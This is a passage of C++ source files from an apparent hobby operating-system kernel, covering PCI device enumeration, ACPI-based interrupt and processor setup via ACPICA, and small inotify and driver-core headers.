// << ", device: 0x" << frigg::logHex(subsystem_device) << frigg::endLog;
auto status = readPciHalf(bus, slot, function, kPciStatus);
if(status & 0x08)
frigg::infoLogger() << "\e[35m IRQ is asserted!\e[39m" << frigg::endLog;
auto device = frigg::makeShared<PciDevice>(*kernelAlloc, bus, slot, function,
vendor, device_id, revision, class_code, sub_class, interface);
// Find all capabilities.
if(status & 0x10) {
// The bottom two bits of each capability offset must be masked!
uint8_t offset = readPciByte(bus, slot, function, kPciRegularCapabilities) & 0xFC;
while(offset != 0) {
auto type = readPciByte(bus, slot, function, offset);
auto name = nameOfCapability(type);
if(name) {
frigg::infoLogger() << " " << name << " capability"
<< frigg::endLog;
}else{
frigg::infoLogger() << " Capability of type 0x"
<< frigg::logHex((int)type) << frigg::endLog;
}
// TODO:
size_t size = -1;
if(type == 0x09)
size = readPciByte(bus, slot, function, offset + 2);
device->caps.push({type, offset, size});
uint8_t successor = readPciByte(bus, slot, function, offset + 1);
offset = successor & 0xFC;
}
}
// Determine the BARs
for(int i = 0; i < 6; i++) {
uint32_t offset = kPciRegularBar0 + i * 4;
uint32_t bar = readPciWord(bus, slot, function, offset);
if(bar == 0)
continue;
if((bar & 1) != 0) {
uintptr_t address = bar & 0xFFFFFFFC;
// write all 1s to the BAR and read it back to determine this its length.
writePciWord(bus, slot, function, offset, 0xFFFFFFFF);
uint32_t mask = readPciWord(bus, slot, function, offset) & 0xFFFFFFFC;
writePciWord(bus, slot, function, offset, bar);
auto length = computeBarLength(mask);
device->bars[i].type = PciDevice::kBarIo;
device->bars[i].address = address;
device->bars[i].length = length;
device->bars[i].io = frigg::makeShared<IoSpace>(*kernelAlloc);
for(size_t p = 0; p < length; ++p)
device->bars[i].io->addPort(address + p);
device->bars[i].offset = 0;
frigg::infoLogger() << " I/O space BAR #" << i
<< " at 0x" << frigg::logHex(address)
<< ", length: " << length << " ports" << frigg::endLog;
}else if(((bar >> 1) & 3) == 0) {
uint32_t address = bar & 0xFFFFFFF0;
// Write all 1s to the BAR and read it back to determine this its length.
writePciWord(bus, slot, function, offset, 0xFFFFFFFF);
uint32_t mask = readPciWord(bus, slot, function, offset) & 0xFFFFFFF0;
writePciWord(bus, slot, function, offset, bar);
auto length = computeBarLength(mask);
device->bars[i].type = PciDevice::kBarMemory;
device->bars[i].address = address;
device->bars[i].length = length;
auto offset = address & (kPageSize - 1);
device->bars[i].memory = frigg::makeShared<HardwareMemory>(*kernelAlloc,
address & ~(kPageSize - 1),
(length + offset + (kPageSize - 1)) & ~(kPageSize - 1),
CachingMode::null);
device->bars[i].offset = offset;
frigg::infoLogger() << " 32-bit memory BAR #" << i
<< " at 0x" << frigg::logHex(address)
<< ", length: " << length << " bytes" << frigg::endLog;
}else if(((bar >> 1) & 3) == 2) {
assert(i < 5); // Otherwise there is no next bar.
auto high = readPciWord(bus, slot, function, offset + 4);;
auto address = (uint64_t{high} << 32) | (bar & 0xFFFFFFF0);
// Write all 1s to the BAR and read it back to determine this its length.
writePciWord(bus, slot, function, offset, 0xFFFFFFFF);
writePciWord(bus, slot, function, offset + 4, 0xFFFFFFFF);
uint32_t mask = (uint64_t{readPciWord(bus, slot, function, offset + 4)} << 32)
| (readPciWord(bus, slot, function, offset) & 0xFFFFFFF0);
writePciWord(bus, slot, function, offset, bar);
writePciWord(bus, slot, function, offset + 4, high);
auto length = computeBarLength(mask);
device->bars[i].type = PciDevice::kBarMemory;
device->bars[i].address = address;
device->bars[i].length = length;
auto offset = address & (kPageSize - 1);
device->bars[i].memory = frigg::makeShared<HardwareMemory>(*kernelAlloc,
address & ~(kPageSize - 1),
(length + offset + (kPageSize - 1)) & ~(kPageSize - 1),
CachingMode::null);
device->bars[i].offset = offset;
frigg::infoLogger() << " 64-bit memory BAR #" << i
<< " at 0x" << frigg::logHex(address)
<< ", length: " << length << " bytes" << frigg::endLog;
i++;
}else{
assert(!"Unexpected BAR type");
}
}
auto irq_index = static_cast<IrqIndex>(readPciByte(bus, slot, function,
kPciRegularInterruptPin));
if(irq_index != IrqIndex::null) {
auto irq_pin = resolveRoute(routing, slot, irq_index);
frigg::infoLogger() << " Interrupt: "
<< nameOf(irq_index)
<< " (routed to " << irq_pin->name() << ")" << frigg::endLog;
device->interrupt = irq_pin;
}
allDevices->push(device);
}
// TODO: This should probably be moved somewhere else.
if(class_code == 0x0C && sub_class == 0x03 && interface == 0x00) {
frigg::infoLogger() << " \e[32mDisabling UHCI SMI generation!\e[39m"
<< frigg::endLog;
writePciHalf(bus, slot, function, 0xC0, 0x2000);
}
}
void checkPciFunction(uint32_t bus, uint32_t slot, uint32_t function,
const RoutingInfo &routing);
void checkPciDevice(uint32_t bus, uint32_t slot,
const RoutingInfo &routing) {
uint16_t vendor = readPciHalf(bus, slot, 0, kPciVendor);
if(vendor == 0xFFFF)
return;
frigg::infoLogger() << " Bus: " << bus << ", slot " << slot << frigg::endLog;
uint8_t header_type = readPciByte(bus, slot, 0, kPciHeaderType);
if((header_type & 0x80) != 0) {
for(uint32_t function = 0; function < 8; function++)
checkPciFunction(bus, slot, function, routing);
}else{
checkPciFunction(bus, slot, 0, routing);
}
}
void checkPciBus(uint32_t bus, const RoutingInfo &routing) {
for(uint32_t slot = 0; slot < 32; slot++)
checkPciDevice(bus, slot, routing);
}
void pciDiscover(const RoutingInfo &routing) {
frigg::infoLogger() << "thor: Discovering PCI devices" << frigg::endLog;
allDevices.initialize(*kernelAlloc);
checkPciBus(0, routing);
/* enumerationQueue.push(0);
while(!enumerationQueue.empty()) {
auto bus = enumerationQueue.front();
enumerationQueue.pop();
checkPciBus(bus);
}*/
}
void runAllDevices() {
for(auto it = allDevices->begin(); it != allDevices->end(); ++it) {
runDevice(*it);
}
}
} } // namespace thor::pci
<file_sep>
#include <algorithm>
#include <frigg/debug.hpp>
#include <frigg/initializer.hpp>
#include <frigg/optional.hpp>
#include <frigg/string.hpp>
#include <frigg/vector.hpp>
#include "../../arch/x86/cpu.hpp"
#include "../../arch/x86/hpet.hpp"
#include "../../arch/x86/pic.hpp"
#include "../../generic/kernel_heap.hpp"
#include "../../system/pci/pci.hpp"
#include "pm-interface.hpp"
extern "C" {
#include <acpi.h>
}
/*
namespace acpi {
};
bool hasChildren(ACPI_HANDLE parent) {
ACPI_HANDLE child;
ACPI_STATUS status = AcpiGetNextObject(ACPI_TYPE_ANY, parent, nullptr, &child);
if(status == AE_NOT_FOUND)
return false;
ACPICA_CHECK(status);
return true;
}
void dumpNamespace(ACPI_HANDLE object, int depth = 0) {
ACPI_OBJECT_TYPE type;
ACPICA_CHECK(AcpiGetType(object, &type));
char segment[5];
ACPI_BUFFER name_buffer;
name_buffer.Pointer = segment;
name_buffer.Length = 5;
ACPICA_CHECK(AcpiGetName(object, ACPI_SINGLE_NAME, &name_buffer));
auto indent = [&] {
for(int i = 0; i < depth; i++)
std::cout << " ";
};
auto typeString = [] (ACPI_OBJECT_TYPE type) -> std::string {
if(type == ACPI_TYPE_INTEGER) {
return "Integer";
}else if(type == ACPI_TYPE_STRING) {
return "String";
}else if(type == ACPI_TYPE_BUFFER) {
return "Buffer";
}else if(type == ACPI_TYPE_PACKAGE) {
return "Package";
}else if(type == ACPI_TYPE_DEVICE) {
return "Device";
}else if(type == ACPI_TYPE_METHOD) {
return "Method";
}else if(type == ACPI_TYPE_MUTEX) {
return "Mutex";
}else if(type == ACPI_TYPE_REGION) {
return "Region";
}else if(type == ACPI_TYPE_PROCESSOR) {
return "Processor";
}else if(type == ACPI_TYPE_LOCAL_SCOPE) {
return "Scope";
}else{
std::stringstream s;
s << "[Type 0x" << std::hex << type << std::dec << "]";
return s.str();
}
};
indent();
std::cout << segment << ": " << typeString(type);
if(type == ACPI_TYPE_INTEGER) {
ACPI_OBJECT result;
ACPI_BUFFER buffer;
buffer.Pointer = &result;
buffer.Length = sizeof(ACPI_OBJECT);
ACPICA_CHECK(AcpiEvaluateObjectTyped(object, nullptr,
nullptr, &buffer, ACPI_TYPE_INTEGER));
std::cout << " 0x" << std::hex << result.Integer.Value << std::dec;
}
std::cout << std::endl;
if(type == ACPI_TYPE_DEVICE) {
ACPI_DEVICE_INFO *info;
ACPICA_CHECK(AcpiGetObjectInfo(object, &info));
if(info->HardwareId.String) {
indent();
std::cout << "* Hardware ID: " << info->HardwareId.String << std::endl;
}
ACPI_FREE(info);
}
if(hasChild(object, "_CRS")) {
walkResources(object, "_CRS", [&] (ACPI_RESOURCE *r) {
if(r->Type == ACPI_RESOURCE_TYPE_IRQ) {
indent();
std::cout << "* Resource: Irq (";
for(uint8_t i = 0; i < r->Data.Irq.InterruptCount; i++) {
if(i)
std::cout << ", ";
std::cout << (int)r->Data.Irq.Interrupts[i];
}
std::cout << ")" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_EXTENDED_IRQ) {
indent();
std::cout << "* Resource: Irq (";
for(uint8_t i = 0; i < r->Data.ExtendedIrq.InterruptCount; i++) {
if(i)
std::cout << ", ";
std::cout << (int)r->Data.ExtendedIrq.Interrupts[i];
}
std::cout << ")" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_DMA) {
indent();
std::cout << "* Resource: Dma" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_IO) {
indent();
std::cout << "* Resource: Io ("
<< std::hex << "Base: 0x" << r->Data.Io.Minimum
<< ", Length: 0x" << (int)r->Data.Io.AddressLength << std::dec
<< ")" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_ADDRESS16) {
indent();
std::cout << "* Resource: Address16 ("
<< std::hex << "Base: 0x" << r->Data.Address16.Address.Minimum
<< ", Length: 0x" << r->Data.Address16.Address.AddressLength << std::dec
<< ")" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_ADDRESS32) {
indent();
std::cout << "* Resource: Address32 ("
<< std::hex << "Base: 0x" << r->Data.Address32.Address.Minimum
<< ", Length: 0x" << r->Data.Address32.Address.AddressLength << std::dec
<< ")" << std::endl;
}else if(r->Type != ACPI_RESOURCE_TYPE_END_TAG) {
indent();
std::cout << "* Resource: [Type 0x"
<< std::hex << r->Type << std::dec << "]" << std::endl;
}
});
}
*/
/* if(strcmp(segment, "PCI0") == 0) {
ACPI_BUFFER rt_buffer;
rt_buffer.Pointer = nullptr;
rt_buffer.Length = ACPI_ALLOCATE_BUFFER;
ACPICA_CHECK(AcpiGetIrqRoutingTable(object, &rt_buffer));
frigg::infoLogger() << "Routing table:" << frigg::endLog;
size_t offset = 0;
while(true) {
assert(offset < rt_buffer.Length);
auto entry = (ACPI_PCI_ROUTING_TABLE *)((char *)rt_buffer.Pointer + offset);
if(entry->Length == 0)
break;
frigg::infoLogger() << "Pin: " << entry->Pin
<< ", source: " << (const char *)entry->Source << frigg::endLog;
offset += entry->Length;
}
AcpiOsFree(rt_buffer.Pointer);
}
*/
/*
auto children = getChildren(object);
for(ACPI_HANDLE child : children)
dumpNamespace(child, depth + 1);
}
void dumpNamespace() {
auto children = getChildren(ACPI_ROOT_OBJECT);
for(ACPI_HANDLE child : children)
dumpNamespace(child);
}
void pciDiscover(); // TODO: put this in a header file
*/
namespace thor {
namespace acpi {
void acpicaCheckFailed(const char *expr, const char *file, int line) {
frigg::panicLogger() << "ACPICA_CHECK failed: "
<< expr << "\nIn file " << file << " on line " << line
<< frigg::endLog;
}
#define ACPICA_CHECK(expr) do { if((expr) != AE_OK) { \
acpicaCheckFailed(#expr, __FILE__, __LINE__); } } while(0)
struct MadtHeader {
uint32_t localApicAddress;
uint32_t flags;
};
struct MadtGenericEntry {
uint8_t type;
uint8_t length;
};
struct MadtLocalEntry {
MadtGenericEntry generic;
uint8_t processorId;
uint8_t localApicId;
uint32_t flags;
};
namespace local_flags {
static constexpr uint32_t enabled = 1;
};
struct MadtIoEntry {
MadtGenericEntry generic;
uint8_t ioApicId;
uint8_t reserved;
uint32_t mmioAddress;
uint32_t systemIntBase;
};
enum OverrideFlags {
polarityMask = 0x03,
polarityDefault = 0x00,
polarityHigh = 0x01,
polarityLow = 0x03,
triggerMask = 0x0C,
triggerDefault = 0x00,
triggerEdge = 0x04,
triggerLevel = 0x0C
};
struct MadtIntOverrideEntry {
MadtGenericEntry generic;
uint8_t bus;
uint8_t sourceIrq;
uint32_t systemInt;
uint16_t flags;
};
struct MadtLocalNmiEntry {
MadtGenericEntry generic;
uint8_t processorId;
uint16_t flags;
uint8_t localInt;
} __attribute__ (( packed ));
struct HpetEntry {
uint32_t generalCapsAndId;
ACPI_GENERIC_ADDRESS address;
uint8_t hpetNumber;
uint16_t minimumTick;
uint8_t pageProtection;
} __attribute__ (( packed ));
// --------------------------------------------------------
struct ScopedBuffer {
friend void swap(ScopedBuffer &a, ScopedBuffer &b) {
using std::swap;
swap(a._object, b._object);
}
ScopedBuffer() {
_object.Length = ACPI_ALLOCATE_BUFFER;
_object.Pointer = nullptr;
}
ScopedBuffer(const ScopedBuffer &) = delete;
ScopedBuffer(ScopedBuffer &&other)
: ScopedBuffer() {
swap(*this, other);
}
~ScopedBuffer() {
if(_object.Pointer)
AcpiOsFree(_object.Pointer);
}
ScopedBuffer &operator= (ScopedBuffer other) {
swap(*this, other);
return *this;
}
size_t size() {
assert(_object.Pointer);
return _object.Length;
}
void *data() {
assert(_object.Pointer);
return _object.Pointer;
}
ACPI_BUFFER *get() {
return &_object;
}
private:
ACPI_BUFFER _object;
};
frigg::Vector<ACPI_HANDLE, KernelAlloc> getChildren(ACPI_HANDLE parent) {
frigg::Vector<ACPI_HANDLE, KernelAlloc> results{*kernelAlloc};
ACPI_HANDLE child = nullptr;
while(true) {
ACPI_STATUS status = AcpiGetNextObject(ACPI_TYPE_ANY, parent, child, &child);
if(status == AE_NOT_FOUND)
break;
ACPICA_CHECK(status);
results.push(child);
}
return results;
}
bool hasChild(ACPI_HANDLE parent, const char *path) {
ACPI_HANDLE child = nullptr;
while(true) {
ACPI_STATUS status = AcpiGetNextObject(ACPI_TYPE_ANY, parent, child, &child);
if(status == AE_NOT_FOUND)
return false;
ACPICA_CHECK(status);
acpi::ScopedBuffer buffer;
ACPICA_CHECK(AcpiGetName(child, ACPI_SINGLE_NAME, buffer.get()));
if(!strcmp(static_cast<char *>(buffer.data()), path))
return true;
}
}
ACPI_HANDLE getChild(ACPI_HANDLE parent, const char *path) {
ACPI_HANDLE child;
ACPICA_CHECK(AcpiGetHandle(parent, const_cast<char *>(path), &child));
return child;
}
uint64_t evaluate(ACPI_HANDLE handle) {
acpi::ScopedBuffer buffer;
ACPICA_CHECK(AcpiEvaluateObject(handle, nullptr, nullptr, buffer.get()));
auto object = reinterpret_cast<ACPI_OBJECT *>(buffer.data());
assert(object->Type == ACPI_TYPE_INTEGER);
return object->Integer.Value;
}
void evaluateWith1(ACPI_HANDLE handle) {
ACPI_OBJECT args[1];
args[0].Integer.Type = ACPI_TYPE_INTEGER;
args[0].Integer.Value = 1;
ACPI_OBJECT_LIST list;
list.Count = 1;
list.Pointer = args;
ACPICA_CHECK(AcpiEvaluateObject(handle, nullptr, &list, nullptr));
}
template<typename F>
void walkResources(ACPI_HANDLE object, const char *method, F functor) {
auto fptr = [] (ACPI_RESOURCE *r, void *c) -> ACPI_STATUS {
(*static_cast<F *>(c))(r);
return AE_OK;
};
ACPICA_CHECK(AcpiWalkResources(object, const_cast<char *>(method), fptr, &functor));
}
// --------------------------------------------------------
struct IrqConfiguration {
bool specified() {
return trigger != TriggerMode::null
&& polarity != Polarity::null;
}
bool compatible(IrqConfiguration other) {
assert(specified());
return trigger == other.trigger
&& polarity == other.polarity;
}
TriggerMode trigger;
Polarity polarity;
};
struct IrqLine {
unsigned int gsi;
IrqConfiguration configuration;
};
IrqLine defaultIrq(unsigned int irq) {
return IrqLine{irq, IrqConfiguration{TriggerMode::edge, Polarity::high}};
}
frigg::LazyInitializer<frigg::Optional<IrqLine>> irqOverrides[16];
IrqLine resolveIrq(unsigned int irq) {
assert(irq < 16);
if((*irqOverrides[irq]))
return *(*irqOverrides[irq]);
return defaultIrq(irq);
}
IrqLine overrideIrq(unsigned int irq, IrqConfiguration desired) {
if(irq < 16 && *irqOverrides[irq]) {
assert(desired.compatible((*irqOverrides[irq])->configuration));
return *(*irqOverrides[irq]);
}
return IrqLine{irq, desired};
}
// --------------------------------------------------------
void commitIrq(IrqLine line) {
auto pin = getGlobalSystemIrq(line.gsi);
pin->configure(line.configuration.trigger, line.configuration.polarity);
}
// --------------------------------------------------------
uint32_t handlePowerButton(void *context) {
frigg::infoLogger() << "thor: Preparing for shutdown" << frigg::endLog;
ACPICA_CHECK(AcpiEnterSleepStatePrep(5));
ACPICA_CHECK(AcpiEnterSleepState(5));
return ACPI_INTERRUPT_HANDLED;
}
void dispatchEvent(uint32_t type, ACPI_HANDLE device, uint32_t number, void *context) {
if(type == ACPI_EVENT_TYPE_FIXED) {
frigg::infoLogger() << "thor: Fixed ACPI event" << frigg::endLog;
}else{
assert(type == ACPI_EVENT_TYPE_GPE);
frigg::infoLogger() << "thor: ACPI GPE event" << frigg::endLog;
}
}
// --------------------------------------------------------
frigg::String<KernelAlloc> getHardwareId(ACPI_HANDLE handle) {
frigg::String<KernelAlloc> string{*kernelAlloc};
ACPI_DEVICE_INFO *info;
ACPICA_CHECK(AcpiGetObjectInfo(handle, &info));
if(info->HardwareId.Length)
string = frigg::String<KernelAlloc>{*kernelAlloc,
info->HardwareId.String, info->HardwareId.Length - 1};
ACPI_FREE(info);
return string;
}
// --------------------------------------------------------
IrqConfiguration irqConfig[24];
void configureIrq(unsigned int gsi, IrqConfiguration desired) {
assert(gsi < 24);
assert(desired.specified());
if(!irqConfig[gsi].specified()) {
auto pin = getGlobalSystemIrq(gsi);
pin->configure(desired.trigger, desired.polarity);
irqConfig[gsi] = desired;
}else{
assert(irqConfig[gsi].compatible(desired));
}
}
IrqPin *configureRoute(const char *link_path) {
auto decodeTrigger = [] (unsigned int trigger) {
switch(trigger) {
case ACPI_LEVEL_SENSITIVE: return TriggerMode::level;
case ACPI_EDGE_SENSITIVE: return TriggerMode::edge;
default: frigg::panicLogger() << "Bad ACPI IRQ trigger mode" << frigg::endLog;
}
};
auto decodePolarity = [] (unsigned int polarity) {
switch(polarity) {
case ACPI_ACTIVE_HIGH: return Polarity::high;
case ACPI_ACTIVE_LOW: return Polarity::low;
default: frigg::panicLogger() << "Bad ACPI IRQ polarity" << frigg::endLog;
}
};
// TODO: Hack to null-terminate the string.
auto handle = getChild(ACPI_ROOT_OBJECT, link_path);
if(hasChild(handle, "_STA")) {
auto status = evaluate(getChild(handle, "_STA"));
if(!(status & 1)) {
frigg::infoLogger() << " Link device is not present." << frigg::endLog;
return nullptr;
}else if(!(status & 2)) {
frigg::infoLogger() << " Link device is not enabled." << frigg::endLog;
return nullptr;
}
}
IrqPin *pin = nullptr;
walkResources(handle, "_CRS", [&] (ACPI_RESOURCE *r) {
if(r->Type == ACPI_RESOURCE_TYPE_IRQ) {
assert(r->Data.Irq.InterruptCount == 1);
auto trigger = decodeTrigger(r->Data.ExtendedIrq.Triggering);
auto polarity = decodePolarity(r->Data.ExtendedIrq.Polarity);
frigg::infoLogger() << " Resource: Irq "
<< (int)r->Data.Irq.Interrupts[0]
<< ", trigger mode: " << static_cast<int>(trigger)
<< ", polarity: " << static_cast<int>(polarity)
<< frigg::endLog;
assert(!pin);
configureIrq(r->Data.Irq.Interrupts[0], {trigger, polarity});
pin = getGlobalSystemIrq(r->Data.Irq.Interrupts[0]);
}else if(r->Type == ACPI_RESOURCE_TYPE_EXTENDED_IRQ) {
assert(r->Data.ExtendedIrq.InterruptCount == 1);
auto trigger = decodeTrigger(r->Data.ExtendedIrq.Triggering);
auto polarity = decodePolarity(r->Data.ExtendedIrq.Polarity);
frigg::infoLogger() << " Resource: Extended Irq "
<< (int)r->Data.ExtendedIrq.Interrupts[0]
<< ", trigger mode: " << static_cast<int>(trigger)
<< ", polarity: " << static_cast<int>(polarity)
<< frigg::endLog;
assert(!pin);
configureIrq(r->Data.ExtendedIrq.Interrupts[0], {trigger, polarity});
pin = getGlobalSystemIrq(r->Data.ExtendedIrq.Interrupts[0]);
}else if(r->Type != ACPI_RESOURCE_TYPE_END_TAG) {
frigg::infoLogger() << " Resource: [Type "
<< r->Type << "]" << frigg::endLog;
}
});
assert(pin);
return pin;
}
void enumerateSystemBusses() {
auto sb = getChild(ACPI_ROOT_OBJECT, "_SB_");
for(auto child : getChildren(sb)) {
auto id = getHardwareId(child);
if(id != "PNP0A03" && id != "PNP0A08")
continue;
frigg::infoLogger() << "thor: Found PCI host bridge" << frigg::endLog;
pci::RoutingInfo routing{*kernelAlloc};
acpi::ScopedBuffer buffer;
ACPICA_CHECK(AcpiGetIrqRoutingTable(child, buffer.get()));
size_t offset = 0;
while(true) {
auto route = (ACPI_PCI_ROUTING_TABLE *)((char *)buffer.data() + offset);
if(!route->Length)
break;
auto slot = route->Address >> 16;
auto function = route->Address & 0xFFFF;
assert(function == 0xFFFF);
auto index = static_cast<pci::IrqIndex>(route->Pin + 1);
if(!*route->Source) {
frigg::infoLogger() << " Route for slot " << slot
<< ", " << nameOf(index) << ": "
<< "GSI " << route->SourceIndex << frigg::endLog;
configureIrq(route->SourceIndex, {TriggerMode::level, Polarity::low});
auto pin = getGlobalSystemIrq(route->SourceIndex);
routing.push({slot, index, pin});
}else{
frigg::infoLogger() << " Route for slot " << slot
<< ", " << nameOf(index) << ": " << (const char *)route->Source
<< "[" << route->SourceIndex << "]" << frigg::endLog;
assert(!route->SourceIndex);
auto pin = configureRoute(const_cast<const char *>(route->Source));
routing.push({slot, index, pin});
}
offset += route->Length;
}
pci::pciDiscover(routing);
}
}
// --------------------------------------------------------
void bootOtherProcessors() {
ACPI_TABLE_HEADER *madt;
ACPICA_CHECK(AcpiGetTable(const_cast<char *>("APIC"), 0, &madt));
frigg::infoLogger() << "thor: Booting APs." << frigg::endLog;
size_t offset = sizeof(ACPI_TABLE_HEADER) + sizeof(MadtHeader);
while(offset < madt->Length) {
auto generic = (MadtGenericEntry *)((uint8_t *)madt + offset);
if(generic->type == 0) { // local APIC
auto entry = (MadtLocalEntry *)generic;
// TODO: Support BSPs with APIC ID != 0.
if((entry->flags & local_flags::enabled)
&& entry->localApicId) // We ignore the BSP here.
bootSecondary(entry->localApicId);
}
offset += generic->length;
}
}
// --------------------------------------------------------
void dumpMadt() {
ACPI_TABLE_HEADER *madt;
ACPICA_CHECK(AcpiGetTable(const_cast<char *>("APIC"), 0, &madt));
frigg::infoLogger() << "thor: Dumping MADT" << frigg::endLog;
size_t offset = sizeof(ACPI_TABLE_HEADER) + sizeof(MadtHeader);
while(offset < madt->Length) {
auto generic = (MadtGenericEntry *)((uintptr_t)madt + offset);
if(generic->type == 0) { // local APIC
auto entry = (MadtLocalEntry *)generic;
frigg::infoLogger() << " Local APIC id: "
<< (int)entry->localApicId
<< ((entry->flags & local_flags::enabled) ? "" :" (disabled)")
<< frigg::endLog;
// TODO: This has to be refactored.
// uint32_t id = entry->localApicId;
// if(seen_bsp)
// helControlKernel(kThorSubArch, kThorIfBootSecondary,
// &id, nullptr);
// seen_bsp = 1;
}else if(generic->type == 1) { // I/O APIC
auto entry = (MadtIoEntry *)generic;
frigg::infoLogger() << " I/O APIC id: " << (int)entry->ioApicId
<< ", sytem interrupt base: " << (int)entry->systemIntBase
<< frigg::endLog;
}else if(generic->type == 2) { // interrupt source override
auto entry = (MadtIntOverrideEntry *)generic;
const char *bus, *polarity, *trigger;
if(entry->bus == 0) {
bus = "ISA";
}else{
frigg::panicLogger() << "Unexpected bus in MADT interrupt override"
<< frigg::endLog;
}
if((entry->flags & OverrideFlags::polarityMask) == OverrideFlags::polarityDefault) {
polarity = "default";
}else if((entry->flags & OverrideFlags::polarityMask) == OverrideFlags::polarityHigh) {
polarity = "high";
}else if((entry->flags & OverrideFlags::polarityMask) == OverrideFlags::polarityLow) {
polarity = "low";
}else{
frigg::panicLogger() << "Unexpected polarity in MADT interrupt override"
<< frigg::endLog;
}
if((entry->flags & OverrideFlags::triggerMask) == OverrideFlags::triggerDefault) {
trigger = "default";
}else if((entry->flags & OverrideFlags::triggerMask) == OverrideFlags::triggerEdge) {
trigger = "edge";
}else if((entry->flags & OverrideFlags::triggerMask) == OverrideFlags::triggerLevel) {
trigger = "level";
}else{
frigg::panicLogger() << "Unexpected trigger mode in MADT interrupt override"
<< frigg::endLog;
}
frigg::infoLogger() << " Int override: " << bus << " IRQ " << (int)entry->sourceIrq
<< " is mapped to GSI " << entry->systemInt
<< " (Polarity: " << polarity << ", trigger mode: " << trigger
<< ")" << frigg::endLog;
}else if(generic->type == 4) { // local APIC NMI source
auto entry = (MadtLocalNmiEntry *)generic;
frigg::infoLogger() << " Local APIC NMI: processor " << (int)entry->processorId
<< ", lint: " << (int)entry->localInt << frigg::endLog;
}else{
frigg::infoLogger() << " Unexpected MADT entry of type "
<< generic->type << frigg::endLog;
}
offset += generic->length;
}
}
void initializeBasicSystem() {
ACPICA_CHECK(AcpiInitializeSubsystem());
ACPICA_CHECK(AcpiInitializeTables(nullptr, 16, FALSE));
ACPICA_CHECK(AcpiLoadTables());
frigg::infoLogger() << "thor: ACPICA initialized." << frigg::endLog;
dumpMadt();
ACPI_TABLE_HEADER *madt;
ACPICA_CHECK(AcpiGetTable(const_cast<char *>("APIC"), 0, &madt));
// Configure all interrupt controllers.
// TODO: This should be done during thor's initialization in order to avoid races.
frigg::infoLogger() << "thor: Configuring I/O APICs." << frigg::endLog;
size_t offset = sizeof(ACPI_TABLE_HEADER) + sizeof(MadtHeader);
while(offset < madt->Length) {
auto generic = (MadtGenericEntry *)((uint8_t *)madt + offset);
if(generic->type == 1) { // I/O APIC
auto entry = (MadtIoEntry *)generic;
assert(!entry->systemIntBase);
setupIoApic(entry->mmioAddress);
}
offset += generic->length;
}
// Determine IRQ override configuration.
for(int i = 0; i < 16; i++)
irqOverrides[i].initialize();
offset = sizeof(ACPI_TABLE_HEADER) + sizeof(MadtHeader);
while(offset < madt->Length) {
auto generic = (MadtGenericEntry *)((uint8_t *)madt + offset);
if(generic->type == 2) { // interrupt source override
auto entry = (MadtIntOverrideEntry *)generic;
// ACPI defines only ISA IRQ overrides.
assert(entry->bus == 0);
assert(entry->sourceIrq < 16);
IrqLine line;
line.gsi = entry->systemInt;
auto trigger = entry->flags & OverrideFlags::triggerMask;
auto polarity = entry->flags & OverrideFlags::polarityMask;
if(trigger == OverrideFlags::triggerDefault
&& polarity == OverrideFlags::polarityDefault) {
line.configuration.trigger = TriggerMode::edge;
line.configuration.polarity = Polarity::high;
}else{
assert(trigger != OverrideFlags::triggerDefault);
assert(polarity != OverrideFlags::polarityDefault);
switch(trigger) {
case OverrideFlags::triggerEdge:
line.configuration.trigger = TriggerMode::edge; break;
case OverrideFlags::triggerLevel:
line.configuration.trigger = TriggerMode::level; break;
default:
frigg::panicLogger() << "Illegal IRQ trigger mode in MADT" << frigg::endLog;
}
switch(polarity) {
case OverrideFlags::polarityHigh:
line.configuration.polarity = Polarity::high; break;
case OverrideFlags::polarityLow:
line.configuration.polarity = Polarity::low; break;
default:
frigg::panicLogger() << "Illegal IRQ polarity in MADT" << frigg::endLog;
}
}
assert(!(*irqOverrides[entry->sourceIrq]));
*irqOverrides[entry->sourceIrq] = line;
}
offset += generic->length;
}
// Initialize the HPET.
frigg::infoLogger() << "thor: Setting up HPET." << frigg::endLog;
ACPI_TABLE_HEADER *hpet_table;
ACPICA_CHECK(AcpiGetTable(const_cast<char *>("HPET"), 0, &hpet_table));
auto hpet_entry = (HpetEntry *)((uintptr_t)hpet_table + sizeof(ACPI_TABLE_HEADER));
assert(hpet_entry->address.SpaceId == ACPI_ADR_SPACE_SYSTEM_MEMORY);
setupHpet(hpet_entry->address.Address);
}
void initializeExtendedSystem() {
// Configure the ISA IRQs.
// TODO: This is a hack. We assume that HPET will use legacy replacement
// and that SCI is routed to IRQ 9.
frigg::infoLogger() << "thor: Configuring ISA IRQs." << frigg::endLog;
commitIrq(resolveIrq(0));
commitIrq(resolveIrq(1));
commitIrq(resolveIrq(4));
commitIrq(resolveIrq(9));
commitIrq(resolveIrq(12));
commitIrq(resolveIrq(14));
frigg::infoLogger() << "thor: Entering ACPI mode." << frigg::endLog;
ACPICA_CHECK(AcpiEnableSubsystem(ACPI_FULL_INITIALIZATION));
ACPICA_CHECK(AcpiInstallFixedEventHandler(ACPI_EVENT_POWER_BUTTON,
&handlePowerButton, nullptr));
ACPICA_CHECK(AcpiInstallGlobalEventHandler(&dispatchEvent, nullptr));
ACPICA_CHECK(AcpiInitializeObjects(ACPI_FULL_INITIALIZATION));
if(hasChild(ACPI_ROOT_OBJECT, "_PIC")) {
frigg::infoLogger() << "thor: Invoking \\_PIC method" << frigg::endLog;
evaluateWith1(getChild(ACPI_ROOT_OBJECT, "_PIC"));
}
bootOtherProcessors();
enumerateSystemBusses();
initializePmInterface();
frigg::infoLogger() << "thor: System configuration complete." << frigg::endLog;
}
} } // namespace thor::acpi
<file_sep>
#include "file.hpp"
namespace inotify {
smarter::shared_ptr<File, FileHandle> createFile();
} // namespace inotify
<file_sep>#ifndef POSIX_SUBSYSTEM_DRVCORE_HPP
#define POSIX_SUBSYSTEM_DRVCORE_HPP
#include <string>
#include "device.hpp"
#include "sysfs.hpp"
namespace drvcore {
// This struct corresponds to Linux' struct Device (i.e. a device that is part of sysfs).
// TODO: Make the sysfs::Object private?
struct Device : sysfs::Object {
Device(std::shared_ptr<Device> parent, std::string name, UnixDevice *unix_device);
UnixDevice *unixDevice() {
return _unixDevice;
}
private:
UnixDevice *_unixDevice;
};
void initialize();
void installDevice(std::shared_ptr<Device> device);
void emitHotplug(std::string buffer);
} // namespace drvcore
